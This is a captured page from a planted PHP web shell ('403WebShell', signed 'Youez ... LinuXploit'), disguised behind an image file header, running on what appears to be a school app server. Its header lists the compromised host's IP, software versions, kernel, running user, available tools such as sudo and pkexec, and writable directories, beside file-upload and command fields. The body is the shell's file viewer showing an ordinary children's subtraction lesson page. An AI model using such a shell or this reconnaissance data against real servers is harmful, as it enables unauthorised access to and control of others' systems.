????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.141.33.133
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/apps/school/www_old3/Html/LevelA/Category2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/appsrv.astacus.se/apps/school/www_old3/Html/LevelA/Category2/LevelACat2Lesson16.html
<!doctype html>
<html>
    <head>
        <title>Count and subtract the pots.</title>
        
        <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>

        <style type="text/css">

        </style>

        <script>
            function page_preLoad()
            {
                shared_setDeviceTypeLevelCategoryLastLesson(Level.A, Category.No2);
                
                shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
                
                shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.A, Category.No2, 16), true, true);
                shared_setFooterTable('id_tblFooter', true, true, false, true, true);
                
                var ids_headings = ['id_td_heading1', 'id_td_heading2', 'id_td_heading3'];
                var ids_boxes = ['id_TdSet1Pots3Box', 'id_TdSet1Pots2Box', 'id_TdSet1Pots1Box', 'id_TdSet2Pots4Box', 'id_TdSet2BrokenPots2Box', 'id_TdSet2RemainingPots2Box', 'id_TdSet3Pots5Box', 'id_TdSet3Pots3Box', 'id_TdSet3Pots2Box'];
                var ids_options = ['id_SpanSet1No5', 'id_SpanSet1No2', 'id_SpanSet1No1', 'id_SpanSet1No4', 'id_SpanSet1No3', 'id_SpanSet2No3', 'id_SpanSet2No2_1', 'id_SpanSet2No1', 'id_SpanSet2No5', 'id_SpanSet2No4', 'id_SpanSet2No2_2', 'id_SpanSet3No4', 'id_SpanSet3No2', 'id_SpanSet3No3', 'id_SpanSet3No1', 'id_SpanSet3No5'];
                var ids_texts = ['id_td_text1', 'id_TdSet1Pots3Box', 'id_td_text3', 'id_td_text4', 'id_TdSet1Pots1Box', 'id_td_text6', 'id_td_text7', 'id_TdSet1Pots2Box', 'id_td_text9', 'id_td_text10', 'id_TdSet2Pots4Box', 'id_td_text12', 'id_td_text13', 'id_TdSet2BrokenPots2Box', 'id_td_text15', 'id_td_text16', 'id_TdSet2RemainingPots2Box', 'id_td_text18', 'id_td_text19', 'id_TdSet3Pots5Box', 'id_td_text21', 'id_td_text22', 'id_TdSet3Pots3Box', 'id_td_text24', 'id_td_text25', 'id_TdSet3Pots2Box', 'id_td_text27'];
                var ids_All = ids_options.concat(ids_boxes);
                
                shared_adjust_fontSize_for_ids_all_devices(ids_All, 100);
                shared_adjust_fontSize_for_ids_all_devices(ids_texts, 70);
                shared_adjust_fontSize_for_ids_all_devices(ids_headings, 80);

                shared_init_dropBox_tds_withOUT_drag_here(ids_boxes);
                shared_init_dropping_spans(ids_options);
                
                shared_hideAllExceptFirstElement('id_SpanSet2No2_', 2);
                shared_set_all_draggble_to_false_except_first_element('id_td_Set2No2_', 2);
                
                var id_tables_array = ['id_table1', 'id_table2', 'id_table3'];
                shared_border_collapse_for_tables_except_android(id_tables_array);
            }
        
            function page_onLoad()
            {   
                
            }

            function btnPrevious_click()
            {
                window.location = "LevelACat2Lesson15.html";
            }

            function btnNext_click()
            {
                window.location = "LevelACat2Lesson17.html";
            }        
        
            function btnHome_click()
            {
                shared_btnHomeCategories_click('LevelA');
            }

            function btnLevel_click(levelName)
            {
                var urlString = "Lessons.html?" + levelName;

                var urlEncoded = encodeURI(urlString);

                window.location = urlEncoded;
            }
        
            function DragDrop(id_dropBox, isNo2Set2, ids_array)
            {
                if (shared_isMovingElementIdInTheArraySetIsFilledTrue(id_dropBox, ids_array))
                {
                    shared_setTextAndBackgroundColorToGreenAndIsMovedTrue(shared_currentDropingId, id_dropBox);
                    
                    if (isNo2Set2)
                    {
                        showNextNo2toDrop();
                    }
                    
                    isAllInfosMovedShowClapsAnimation();

                    shared_set_currentDropingId_draggbleToFalse();
                }
                else
                {
                    shared_resetCurrentDroppingPosition(id_dropBox);
                }
            }

            function showNextNo2toDrop()
            {
                shared_unHideNextElementNew('id_SpanSet2No2_', 2);
            }
            
            function isAllInfosMovedShowClapsAnimation()
            {
                var ids_boxes = ['id_TdSet1Pots3Box', 'id_TdSet1Pots2Box', 'id_TdSet1Pots1Box', 'id_TdSet2Pots4Box', 'id_TdSet2BrokenPots2Box', 'id_TdSet2RemainingPots2Box', 'id_TdSet3Pots5Box', 'id_TdSet3Pots3Box', 'id_TdSet3Pots2Box'];
                
                shared_is_all_infos_filled_show_claps_animationWithIsFilled(ids_boxes);
            }

        </script>
    </head>

    <body onload="page_onLoad()">
    <div id="shared_id_div_claps_image">
    </div>
        
<table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0">
    <tr height="8%">
        <td>
            <div id="id_tblHeader"></div>
        </td>
    </tr>
    <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
        <td>
                <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                  <tr>
                    <td>
                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="2%">
                          <tr height="30%">
                            <td style="padding-bottom: 0px">
                                <table id="id_table1" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
                                  <tr height="25%">
                                    <td style="border-bottom:none; border-left:none">
                                        <table width="100%"  height="100%" border="0" cellspacing="0" cellpadding="0">
                                          <tr>
                                            <td width="33%" align="center">
                                                <img id="id_imgSet1Pot1"  src="../../../img/LevelA/Category2/LevelACat2Lesson16/set1Pot.png" width="25%" height="auto">
                                            </td>
                                            <td width="33%" align="center">
                                                <img id="id_imgSet1Pot2" src="../../../img/LevelA/Category2/LevelACat2Lesson16/set1Pot.png"  width="25%" height="auto">
                                            </td>
                                            <td width="*" align="center">
                                                <img id="id_imgSet1Pot3" src="../../../img/LevelA/Category2/LevelACat2Lesson16/set1Pot.png"  width="25%" height="auto">
                                            </td>
                                          </tr>
                                        </table>
                                    </td>
                                  </tr>
                                  <tr height="20%">
                                    <td style="border-bottom:none; border-left:none">
                                        <table id="id_tblOptionsSet1" width="100%" height="100%" border="0" cellpadding="0" cellspacing="0" style="border-collapse:collapse">
                                          <tr>
                                            <td id="id_td_heading1" width="*" class="shared_style_options_blue_24px_bold">Options:</td>
                                            <td id="id_td_Set1No5" width="16%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanSet1No5" class="shared_style_red_24px_bold">5</span></td>
                                            <td id="id_td_Set1No2" width="16%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanSet1No2" class="shared_style_red_24px_bold">2</span></td>
                                            <td id="id_td_Set1No1" width="16%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanSet1No1" class="shared_style_red_24px_bold">1</span></td>
                                            <td id="id_td_Set1No4" width="16%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanSet1No4" class="shared_style_red_24px_bold">4</span></td>
                                            <td id="id_td_Set1No3" width="16%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanSet1No3" class="shared_style_red_24px_bold">3</span></td>
                                          </tr>
                                        </table>
                                    </td>
                                   </tr>
                                  <tr height="*">
                                    <td style="border-left:none">
                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                          <tr id="id_tr_Set1No3" height="33%"
                                              ondragover="shared_highlight('id_TdSet1Pots3Box'); shared_allowDrop_web(event)"
                                              ondragleave="shared_un_highlight('id_TdSet1Pots3Box')"
                                              ondrop="DragDrop('id_TdSet1Pots3Box', false, ['id_SpanSet1No3'])">
                                              <td>
                                                  <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                      <tr>
                                                        <td id="id_td_text1" width="25%" class="shared_style_black_24px_bold" style="padding-left:2%">1. There are </td>
                                                        <td id="id_TdSet1Pots3Box" width="10%" class="cls_TdSet1Pots3Box shared_style_red_24px_bold" style="text-align: center">____</td>
                                                        <td id="id_td_text3" width="*" class="shared_style_black_24px_bold" style="padding-left:2%"><span class="style_Answers">pot</span>s</td>
                                                      </tr>
                                                  </table>
                                              </td>
                                          </tr>
                                          <tr id="id_tr_Set1No1" height="33%"
                                              ondragover="shared_highlight('id_TdSet1Pots1Box'); shared_allowDrop_web(event)"
                                              ondragleave="shared_un_highlight('id_TdSet1Pots1Box')"
                                              ondrop="DragDrop('id_TdSet1Pots1Box', false, ['id_SpanSet1No1'])">
                                              <td>
                                                  <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                      <tr>
                                                          <td id="id_td_text4" width="5%" class="shared_style_black_24px_bold" style="padding-left:2%">If </td>
                                                          <td id="id_TdSet1Pots1Box" width="10%" class="cls_TdSet1Pots1Box shared_style_red_24px_bold" style="text-align: center">____</td>
                                                          <td id="id_td_text6" width="30%" class="shared_style_black_24px_bold" style="padding-left:2%"><span class="style_Answers">pot</span> is broken,</td>
                                                          <td width="15%" class="style_Td" style="text-align: center">
                                                              <img id="id_imgSet1BrokenPot1" src="../../../img/LevelA/Category2/LevelACat2Lesson16/brokenPot.png"  width="35%" height="auto">
                                                          </td>
                                                          <td width="*">&nbsp;</td>
                                                      </tr>
                                                  </table>
                                              </td>
                                            </tr>
                                            <tr id="id_tr_Set1No2" height="*"
                                                ondragover="shared_highlight('id_TdSet1Pots2Box'); shared_allowDrop_web(event)"
                                                ondragleave="shared_un_highlight('id_TdSet1Pots2Box')"
                                                ondrop="DragDrop('id_TdSet1Pots2Box', false, ['id_SpanSet1No2'])">
                                                <td>
                                                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                        <tr>
                                                            <td id="id_td_text7" width="24%" class="shared_style_black_24px_bold" style="padding-left:2%">There will be</td>
                                                            <td id="id_TdSet1Pots2Box" width="10%" class="cls_TdSet1Pots2Box shared_style_red_24px_bold" style="text-align: center">____</td>
                                                            <td id="id_td_text9" width="*" class="shared_style_black_24px_bold" style="padding-left:2%"><span class="style_Answers">pot</span>s left.</td>
                                                        </tr>
                                                    </table>
                                                </td>
                                            </tr>
                                        </table>
                                    </td>
                                  </tr>
                                </table>
                            </td>
                          </tr>
                          <tr height="30%">
                            <td style="padding-bottom: 0px">
                                <table id="id_table2" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
                                  <tr height="25%">
                                    <td style="border-bottom:none; border-left:none">
                                        <table width="100%" height="100%" cellpadding="0" cellspacing="0">
                                          <tr>
                                            <td width="25%" align="center">
                                                <img id="id_imgSet2Pot1" src="../../../img/LevelA/Category2/LevelACat2Lesson16/set2Pot.png" width="25%" height="auto">
                                            </td>
                                            <td width="25%" align="center">
                                                <img id="id_imgSet2Pot2" src="../../../img/LevelA/Category2/LevelACat2Lesson16/set2Pot.png" width="25%" height="auto">
                                            </td>
                                            <td width="25%" align="center">
                                                <img id="id_imgSet2Pot3" src="../../../img/LevelA/Category2/LevelACat2Lesson16/set2Pot.png" width="25%" height="auto">
                                            </td>
                                            <td width="*" align="center">
                                                <img id="id_imgSet2Pot4" src="../../../img/LevelA/Category2/LevelACat2Lesson16/set2Pot.png" width="25%" height="auto">
                                            </td>
                                          </tr>
                                        </table>
                                    </td>
                                  </tr>
                                  <tr height="20%">
                                    <td style="border-left:none">
                                        <table id="id_tblOptionsSet2" width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="border-collapse:collapse">
                                          <tr>
                                            <td id="id_td_heading2" width="*" class="shared_style_options_blue_24px_bold">Options:</td>
                                            <td id="id_td_Set2No3"width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanSet2No3" class="shared_style_red_24px_bold">3</span></td>
                                            <td id="id_td_Set2No2_1" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanSet2No2_1" class="shared_style_red_24px_bold">2</span></td>
                                            <td id="id_td_Set2No1"width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanSet2No1" class="shared_style_red_24px_bold">1</span></td>
                                            <td id="id_td_Set2No5"width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanSet2No5" class="shared_style_red_24px_bold">5</span></td>
                                            <td id="id_td_Set2No4"width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanSet2No4" class="shared_style_red_24px_bold">4</span></td>
                                            <td id="id_td_Set2No2_2" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanSet2No2_2" class="shared_style_red_24px_bold">2</span></td>
                                          </tr>
                                        </table>
                                    </td>
                                  </tr>
                                    <tr height="*">
                                        <td style="border-left:none">
                                            <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                <tr id="id_tr_Set2No4" height="33%"
                                                    ondragover="shared_highlight('id_TdSet2Pots4Box'); shared_allowDrop_web(event)"
                                                    ondragleave="shared_un_highlight('id_TdSet2Pots4Box')"
                                                    ondrop="DragDrop('id_TdSet2Pots4Box', false, ['id_SpanSet2No4'])">
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr>
                                                                <td id="id_td_text10" width="23%" class="shared_style_black_24px_bold" style="padding-left:2%">1. There are </td>
                                                                <td id="id_TdSet2Pots4Box" width="10%" class="cls_TdSet2Pots4Box shared_style_red_24px_bold" style="text-align: center">____</td>
                                                                <td id="id_td_text12" width="*" class="shared_style_black_24px_bold" style="padding-left:2%"><span class="style_Answers">pot</span>s</td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                                <tr id="id_tr_Set2No2_1" height="33%"
                                                    ondragover="shared_highlight('id_TdSet2BrokenPots2Box'); shared_allowDrop_web(event)"
                                                    ondragleave="shared_un_highlight('id_TdSet2BrokenPots2Box')"
                                                    ondrop="DragDrop('id_TdSet2BrokenPots2Box', true, ['id_SpanSet2No2_1', 'id_SpanSet2No2_2'])">
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr>
                                                                <td id="id_td_text13" width="5%" class="shared_style_black_24px_bold" style="padding-left:2%">If </td>
                                                                <td id="id_TdSet2BrokenPots2Box" width="10%" class="cls_TdSet2BrokenPots2Box shared_style_red_24px_bold" style="text-align: center">____</td>
                                                                <td id="id_td_text15" width="31%" class="shared_style_black_24px_bold" style="padding-left:2%"><span class="style_Answers">pot</span>s are broken,</td>
                                                                <td width="15%" class="style_Td" style="text-align: center">
                                                                    <img id="id_imgSet2BrokenPot1" src="../../../img/LevelA/Category2/LevelACat2Lesson16/brokenPot.png"  width="35%" height="auto">
                                                                </td>
                                                                <td width="15%" class="style_Td" style="text-align: center">
                                                                    <img id="id_imgSet2BrokenPot2" src="../../../img/LevelA/Category2/LevelACat2Lesson16/brokenPot.png"  width="35%" height="auto">
                                                                </td>
                                                                <td width="*">&nbsp;</td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                                <tr id="id_tr_Set2No2_2" height="*"
                                                    ondragover="shared_highlight('id_TdSet2RemainingPots2Box'); shared_allowDrop_web(event)"
                                                    ondragleave="shared_un_highlight('id_TdSet2RemainingPots2Box')"
                                                    ondrop="DragDrop('id_TdSet2RemainingPots2Box', true, ['id_SpanSet2No2_1', 'id_SpanSet2No2_2'])">
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr>
                                                                <td id="id_td_text16" width="24%" class="shared_style_black_24px_bold" style="padding-left:2%">There will be</td>
                                                                <td id="id_TdSet2RemainingPots2Box" width="10%" class="cls_TdSet2RemainingPots2Box shared_style_red_24px_bold" style="text-align: center">____</td>
                                                                <td id="id_td_text18" width="*" class="shared_style_black_24px_bold" style="padding-left:2%"><span class="style_Answers">pot</span>s left.</td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                </table>
                            </td>
                          </tr>
                          <tr height="*">
                            <td>
                                <table id="id_table3" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
                                  <tr height="25%">
                                    <td style="border-bottom:none; border-left:none">
                                        <table width="100%" height="100%" cellspacing="0" cellpadding="0">
                                          <tr>
                                            <td width="12%" align="center">
                                                <img id="id_imgSet3Pot1" src="../../../img/LevelA/Category2/LevelACat2Lesson16/set3Pot.png"  width="40%" height="auto">
                                            </td>
                                            <td width="12%" align="center">
                                                <img id="id_imgSet3Pot2" src="../../../img/LevelA/Category2/LevelACat2Lesson16/set3Pot.png"  width="40%" height="auto">
                                            </td>
                                            <td width="12%" align="center">
                                                <img id="id_imgSet3Pot3" src="../../../img/LevelA/Category2/LevelACat2Lesson16/set3Pot.png" width="40%" height="auto">
                                            </td>
                                            <td width="12%" align="center">
                                                <img id="id_imgSet3Pot4" src="../../../img/LevelA/Category2/LevelACat2Lesson16/set3Pot.png" width="40%" height="auto">
                                            </td>
                                            <td width="12%" align="center">
                                                <img id="id_imgSet3Pot5" src="../../../img/LevelA/Category2/LevelACat2Lesson16/set3Pot.png"  width="40%" height="auto">
                                            </td>
                                          </tr>
                                        </table>
                                    </td>
                                  </tr>
                                  <tr height="20%">
                                    <td style="border-bottom:none; border-left:none">
                                        <table id="id_tblOptionsSet3" width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="border-collapse:collapse">
                                          <tr>
                                            <td id="id_td_heading3" width="*" class="shared_style_options_blue_24px_bold">Options:</td>
                                            <td id="id_td_Set3No4" width="16%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanSet3No4" class="shared_style_red_24px_bold">4</span></td>
                                            <td id="id_td_Set3No2" width="16%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanSet3No2" class="shared_style_red_24px_bold">2</span></td>
                                            <td id="id_td_Set3No3" width="16%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanSet3No3" class="shared_style_red_24px_bold">3</span></td>
                                            <td id="id_td_Set3No1" width="16%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanSet3No1" class="shared_style_red_24px_bold">1</span></td>
                                            <td id="id_td_Set3No5" width="16%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_SpanSet3No5" class="shared_style_red_24px_bold">5</span></td>
                                          </tr>
                                        </table>
                                    </td>
                                  </tr>
                                    <tr height="*">
                                        <td style="border-left:none">
                                            <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                <tr id="id_tr_Set3No5" height="33%"
                                                    ondragover="shared_highlight('id_TdSet3Pots5Box'); shared_allowDrop_web(event)"
                                                    ondragleave="shared_un_highlight('id_TdSet3Pots5Box')"
                                                    ondrop="DragDrop('id_TdSet3Pots5Box', false, ['id_SpanSet3No5'])">
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr>
                                                                <td id="id_td_text19" width="23%" class="shared_style_black_24px_bold" style="padding-left:2%">1. There are
                                                                </td>
                                                                <td id="id_TdSet3Pots5Box" width="10%" class="cls_TdSet3Pots5Box shared_style_red_24px_bold" style="text-align: center">____
                                                                </td>
                                                                <td id="id_td_text21" width="*" class="shared_style_black_24px_bold" style="padding-left:2%">
                                                                    <span class="style_Answers">pot</span>s
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                                <tr id="id_tr_Set3No3" height="33%"
                                                    ondragover="shared_highlight('id_TdSet3Pots3Box'); shared_allowDrop_web(event)"
                                                    ondragleave="shared_un_highlight('id_TdSet3Pots3Box')"
                                                    ondrop="DragDrop('id_TdSet3Pots3Box', false, ['id_SpanSet3No3'])">
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr>
                                                                <td id="id_td_text22" width="5%" class="shared_style_black_24px_bold" style="padding-left:2%">If
                                                                </td>
                                                                <td id="id_TdSet3Pots3Box" width="10%" class="cls_TdSet3Pots3Box shared_style_red_24px_bold" style="text-align: center">____
                                                                </td>
                                                                <td id="id_td_text24" width="31%" class="shared_style_black_24px_bold" style="padding-left:2%">
                                                                    <span class="style_Answers">pot</span>s are broken,
                                                                </td>
                                                                <td width="15%" class="style_Td" style="text-align: center">
                                                                    <img id="id_imgSet3BrokenPot1" src="../../../img/LevelA/Category2/LevelACat2Lesson16/brokenPot.png"  width="35%" height="auto">
                                                                </td>
                                                                <td width="15%" class="style_Td" style="text-align: center">
                                                                    <img id="id_imgSet3BrokenPot2" src="../../../img/LevelA/Category2/LevelACat2Lesson16/brokenPot.png"  width="35%" height="auto">
                                                                </td>
                                                                <td width="15%" class="style_Td" style="text-align: center">
                                                                    <img id="id_imgSet3BrokenPot3" src="../../../img/LevelA/Category2/LevelACat2Lesson16/brokenPot.png"  width="35%" height="auto">
                                                                </td>
                                                                <td width="*">&nbsp;</td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                                <tr id="id_tr_Set3No2" height="*"
                                                    ondragover="shared_highlight('id_TdSet3Pots2Box'); shared_allowDrop_web(event)"
                                                    ondragleave="shared_un_highlight('id_TdSet3Pots2Box')"
                                                    ondrop="DragDrop('id_TdSet3Pots2Box', false, ['id_SpanSet3No2'])">
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr>
                                                                <td id="id_td_text25" width="24%" class="shared_style_black_24px_bold" style="padding-left:2%">There will be</td>
                                                                <td id="id_TdSet3Pots2Box" width="10%" class="cls_TdSet1CatsBox shared_style_red_24px_bold" style="text-align: center">____</td>
                                                                <td id="id_td_text27" width="*" class="shared_style_black_24px_bold" style="padding-left:2%"><span class="style_Answers">pot</span>s left.</td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                </table>
                            </td>
                          </tr>
                        </table>
                    </td>
                  </tr>
            </table>
        </td>
    </tr>
    <tr height="8%">
        <td>
            <div id="id_tblFooter"></div>
        </td>
    </tr>
</table>

    <script>
            page_preLoad();
            
            new webkit_draggable('id_SpanSet1No1', {handle : 'id_td_Set1No1', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_SpanSet1No2', {handle : 'id_td_Set1No2', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_SpanSet1No3', {handle : 'id_td_Set1No3', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_SpanSet1No4', {handle : 'id_td_Set1No4', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_SpanSet1No5', {handle : 'id_td_Set1No5', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});

            new webkit_draggable('id_SpanSet2No1', {handle : 'id_td_Set2No1', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_SpanSet2No2_1', {handle : 'id_td_Set2No2_1', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_SpanSet2No3', {handle : 'id_td_Set2No3', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_SpanSet2No4', {handle : 'id_td_Set2No4', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_SpanSet2No5', {handle : 'id_td_Set2No5', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_SpanSet2No2_2', {handle : 'id_td_Set2No2_2', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});

            new webkit_draggable('id_SpanSet3No1', {handle : 'id_td_Set3No1', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_SpanSet3No2', {handle : 'id_td_Set3No2', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_SpanSet3No3', {handle : 'id_td_Set3No3', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_SpanSet3No4', {handle : 'id_td_Set3No4', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_SpanSet3No5', {handle : 'id_td_Set3No5', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});

            webkit_drop.add('id_tr_Set1No3', {onOver : function(){shared_highlight('id_TdSet1Pots3Box')}, onOut : function(){shared_un_highlight('id_TdSet1Pots3Box')}, onDrop : function(){DragDrop('id_TdSet1Pots3Box', false, ['id_SpanSet1No3'])}});
            webkit_drop.add('id_tr_Set1No1', {onOver : function(){shared_highlight('id_TdSet1Pots1Box')}, onOut : function(){shared_un_highlight('id_TdSet1Pots1Box')}, onDrop : function(){DragDrop('id_TdSet1Pots1Box', false, ['id_SpanSet1No1'])}});
            webkit_drop.add('id_tr_Set1No2', {onOver : function(){shared_highlight('id_TdSet1Pots2Box')}, onOut : function(){shared_un_highlight('id_TdSet1Pots2Box')}, onDrop : function(){DragDrop('id_TdSet1Pots2Box', false, ['id_SpanSet1No2'])}});

            webkit_drop.add('id_tr_Set2No4', {onOver : function(){shared_highlight('id_TdSet2Pots4Box')}, onOut : function(){shared_un_highlight('id_TdSet2Pots4Box')}, onDrop : function(){DragDrop('id_TdSet2Pots4Box', false, ['id_SpanSet2No4'])}});
            webkit_drop.add('id_tr_Set2No2_1', {onOver : function(){shared_highlight('id_TdSet2BrokenPots2Box')}, onOut : function(){shared_un_highlight('id_TdSet2BrokenPots2Box')}, onDrop : function(){DragDrop('id_TdSet2BrokenPots2Box', true, ['id_SpanSet2No2_1', 'id_SpanSet2No2_2'])}});
            webkit_drop.add('id_tr_Set2No2_2', {onOver : function(){shared_highlight('id_TdSet2RemainingPots2Box')}, onOut : function(){shared_un_highlight('id_TdSet2RemainingPots2Box')}, onDrop : function(){DragDrop('id_TdSet2RemainingPots2Box', true, ['id_SpanSet2No2_1', 'id_SpanSet2No2_2'])}});

            webkit_drop.add('id_tr_Set3No5', {onOver : function(){shared_highlight('id_TdSet3Pots5Box')}, onOut : function(){shared_un_highlight('id_TdSet3Pots5Box')}, onDrop : function(){DragDrop('id_TdSet3Pots5Box', false, ['id_SpanSet3No5'])}});
            webkit_drop.add('id_tr_Set3No3', {onOver : function(){shared_highlight('id_TdSet3Pots3Box')}, onOut : function(){shared_un_highlight('id_TdSet3Pots3Box')}, onDrop : function(){DragDrop('id_TdSet3Pots3Box', false, ['id_SpanSet3No3'])}});
            webkit_drop.add('id_tr_Set3No2', {onOver : function(){shared_highlight('id_TdSet3Pots2Box')}, onOut : function(){shared_un_highlight('id_TdSet3Pots2Box')}, onDrop : function(){DragDrop('id_TdSet3Pots2Box', false, ['id_SpanSet3No2'])}});
            
        </script>
    </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit